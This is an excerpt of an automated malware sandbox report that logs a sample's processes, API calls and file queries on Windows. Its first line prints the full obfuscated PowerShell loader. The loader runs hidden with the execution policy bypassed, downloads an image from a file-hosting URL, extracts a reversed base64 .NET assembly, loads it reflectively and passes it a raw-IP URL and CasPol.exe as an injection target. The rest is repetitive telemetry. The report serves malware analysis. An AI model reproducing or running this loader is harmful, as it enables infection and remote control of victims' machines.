                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('shnimageurl = b4fhttps://101'+'7.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4f;shnwebcl'+'ient = new-object system.net.webclient;s'+'hnimagebytes = shnwebclient.downlo'+'addata(shnimageurl);shnimagetext = [system.text.encoding]'+'::utf8.getstring(shnim'+'agebytes);shnstartflag = b4f<<base64_start>>b4f;shnendflag = '+'b4f<<base64_end>>b4f;shnstartindex = sh'+'nimagete'+'xt.indexof(shnstartflag);shnendind'+'ex = shnimagetext.indexof(shnendflag);shnstartindex -ge 0 -and shnendindex -gt shnstart'+'index;shnst'+'artindex += shnstartflag'+'.length;shnbase'+'64length = shnendindex - shnstartindex;shnbase64command = shn'+'i'+'magetext.substring(shnstartindex, shnbase64length);shnbase64reversed = -join (shnbase64command.tochararray() s7g foreach-object { shn_ })[-1..-(shnbase64command.length)];shncommandbytes = [system.convert]::frombase64s'+'tring(shnba'+'se64reversed);shnloadedassembly = [system.reflection.assembly]::load'+'(shncommandbytes);shnvaimethod = [dnlib.io.home].getmethod(b4fvaib4f);shnvaimethod.invo'+'ke(shnnull, @(b4ftxt.edssrf/923/831.171.49.32//:ptthb4f, b4fdesativadob4f, b4fdesativadob4'+'f, b4fdesativadob4f, b4fcaspol'+'b4f, b4fdesativadob4f, b4fdesativadob'+'4f,b4fdesativad'+'ob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob'+'4f,b4f1b4f,b4fdesativadob4f));').replace('b4f',[string][char]39).replace('shn','$').replace('s7g','|') |& ( $pshome[4]+$pshome[30]+'x')"Jump to behavior
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern
                    Source: CasPol.exe, 0000000C.00000002.3861630082.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
